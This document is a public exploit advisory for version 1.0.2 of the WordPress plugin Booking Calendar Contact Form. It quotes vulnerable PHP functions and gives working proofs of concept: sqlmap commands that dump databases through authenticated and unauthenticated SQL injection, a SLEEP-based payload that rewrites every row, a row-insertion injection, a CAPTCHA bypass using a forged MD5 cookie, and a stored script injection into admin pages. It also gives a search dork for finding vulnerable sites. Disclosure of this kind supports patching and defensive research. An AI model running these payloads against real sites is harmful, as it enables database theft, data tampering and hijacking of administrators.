# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple vulnerabilities] # Date: 2015-05-01 # Google Dork: Index of /wordpress/wp-content/plugins/booking-calendar-contact-form/ # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form # Vendor: CodePeople.net # Vebdor URI: http://codepeople.net # Version: 1.0.2 # OWASP Top10: A1-Injection # Tested on: windows 7 ultimate + firefox + sqlmap 0.9. ============================================ * Authenticated SQL injection ============================================ ======================== Description ======================== In a site that has installed the plugin vulnerable and an attacker who has an account editor privileges can exploit the flaw SQL injection and possibly escalate their privileges. ======================== Vulnerability ======================== vulnerable function code is located in dex_bcf.php function dex_bccf_load_season_prices() { global $wpdb; if ( ! current_user_can('edit_pages') ) { echo 'No enough privilegies to load this content.'; exit; } if (!defined('CP_BCCF_CALENDAR_ID')) define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]); //.....vulnerable line $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.CP_BCCF_CALENDAR_ID); $maxcosts = 0; ... if (count ($codes)) { ... //Print results [bueno para seleccion mediante UNION] foreach ($codes as $value) { echo ''; $price = explode(';',$value->price); echo ''.$price[0].''; for ($k=1; $k<=$maxcosts; $k++) echo ''.@$price[$k].''; echo ''.substr($value->date_from,0,10).''; echo ''.substr($value->date_to,0,10).''; echo '[Delete]'; echo ''; } ... } ====================== Injection ====================== the following urls can be used to inject code. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1 ------------------------ GET parameter vulnerable ------------------------ dex_item ======================== injection techniques: ======================== -> UNION BASED -> TIME BASED BLIND ======================= POC ======================= Obtaining all available databases from mysql server with sqlmap. --------------------------------------------------------------- python sqlmap.py --url=" http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1 " -p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs ==================================================== ===================================================== * Filter bypass & Authenticated SQL injection ===================================================== =============== Vulnerable code ================ function dex_bccf_calendar_delete($ret) { global $wpdb; $wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where id=".esc_sql($_POST["id"]) ); return $ret; } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete ------------------------ POST parameter vulnerable ------------------------ id ======================== injection techniques: ======================== -> TIME BASED BLIND ======================= POC ======================= Obtaining all available databases from mysql server with sqlmap. --------------------------------------------------------------- python sqlmap.py --url=" http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete " --data="id=1" -p id --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T ==================================================== * Authenticated SQL injection ==================================================== =============== Vulnerable code ================ function dex_bccf_calendar_update($ret) { global $wpdb; dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin", "varchar(10) DEFAULT '0' NOT NULL"); dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color", "varchar(10)"); $wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."' where id=".esc_sql($_POST["id"]) ); return $ret; } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit ------------------------ POST parameter vulnerable ------------------------ id ======================== injection techniques: ======================== -> BLIND ======================= POC ======================= (modifing all rows with "i0akiN" value and sleeping 5 seconds) url ------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit ---------- post data ---------- id=0 or 1=1 AND SLEEP(5) -- - &tile=i0akiN&description=i0akiN&color=i0akiN ===================================================== * Filter bypass & Authenticated SQL injection ===================================================== =============== Vulnerable code ================ function dex_bccf_calendar_add($ret) { global $wpdb; $calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]); ... $wpdb->query("insert into ".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color) ". " values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','" .esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')"); .. } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi] ======================== injection techniques: ======================== -> Insertion data ======================= POC ======================= Insert a row into wp_bccf_reservation_calendars_data table without use other post parameters http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add& id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- - ==================================================== * Unauthenticated SQL injection ==================================================== ======================= Description ======================= An attacker without autorization can send modified requests to database and sensitive information that can use for escalate privilegies and more... ====================== Vulnerability ====================== vulnerable function code is located in dex_bcf.php function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) { ... //$calendar is not sanitized in sql query $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.$calendar); $mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false'); while ( (($enddate>$startday) && !$mode) || (($enddate>=$startday) && $mode) ) { $daily_price = $default_price; $sprice = array(); foreach ($codes as $value) { $sfrom = strtotime($value->date_from); $sto = strtotime($value->date_to); if ($startday >= $sfrom && $startday <= $sto) { $sprice = explode (';', $value->price); $daily_price = $sprice[0]; } } $season_prices[] = $sprice; $price += $daily_price; $startday = strtotime (date("Y-m-d", $startday)." +1 day"); //60*60*24; $days++; } ... } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost ------------------------ post variable vulnerable ------------------------ dex_item=1 ======================== injection techniques: ======================== -> UNION BASED <- yeaahh!! -> TIME BASED BLIND -> BOOLEAN BASED BLIND ======================== POC ======================== Obtaining all available databases from mysql server with sqlmap. python sqlmap.py --url=" http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost " --data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs --tecnique U =========================================================== ============================================================ * Unauthenticated SQL injection 2 ============================================================ ======================== Description ======================== The following function is also vulnerable to SQL injection because usually the variable CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET ['dex_item'] Besides this function is used in several places the code. ======================== Vulnerability ======================== Vulnerable function: function dex_bccf_get_option ($field, $default_value) { global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id; if (!defined("CP_BCCF_CALENDAR_ID")) return $default_value; if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID) $value = @$dex_option_buffered_item->$field; else { //....vulnerable line $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID ); $value = @$myrows[0]->$field; $dex_option_buffered_item = $myrows[0]; $dex_option_buffered_id = CP_BCCF_CALENDAR_ID; } if ($value == '' && $dex_option_buffered_item->calendar_language == '') $value = $default_value; return $value; } ########################################## ====================================== * CAPTCHA BYPASS & ROW INSERTION ====================================== ============== DESCRIPTION ============== An attacker can manipulate some variables for bypass conditional staments. For example: insert unlimited rows into table (could use a program) ============= ... HOW? ============= An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5 encryption saving into value of "rand_code" cookie. ========== POC ========== REQUEST ----------- http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1& dex_item=1& http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data& hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin ^ -------------- | POST VARIABLES -------------- hdcaptcha_dex_bccf_post=1 ------- COOKIES ------- rand_code=a6beca7f198112079f836a4e67cf4821 <---joaquin MD5 encrypted =========================== VULNERABLE FUNCTION CODE ========================== function dex_bccf_check_posted_data(){ .... if (!isset($_GET['hdcaptcha_dex_bccf_post']) ||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post'] = @$_POST['hdcaptcha_dex_bccf_post']; if ( (dex_bccf_get_option('dexcv_enable_captcha', TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') && ( (strtolower($_GET['hdcaptcha_dex_bccf_post']) != strtolower($_SESSION['rand_code'])) || ($_SESSION['rand_code'] == '') ) && ( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) != ($_COOKIE['rand_code'])) || ($_COOKIE['rand_code'] == '') ) ) { $_SESSION['rand_code'] = ''; echo 'captchafailed'; exit; } // if this isn't the real post (it was the captcha verification) then echo ok and exit if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['dex_bccf_post'] ) ) { echo 'ok'; exit; } ... } ########################################### ======================================= * Persistent JS/HTML code injection ======================================= ======================== Description: ======================== Un atacante sin autenticacion puede inyectar codigo malicioso que podria ejecutar el navegador de la victima(could be an administrator). Cuando la victima visite la pagina modificada, el atacante podria robar datos y/o controlar las acciones de la victima de forma remota. ======================== Vulnerability ======================== http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data POST-DATA dex_item=2 dex_bccf_post_options=1 email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION %3Ctextarea%3E email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION %3Ctextarea%3E Parameters email_confirmation_to_user,email_notification_to_admin not filtered and is included in admin page ==================== VULNERABLE FUNCTION ==================== dex_bccf_save_options() located in dex_bccf.php save unfiltered post data #########################################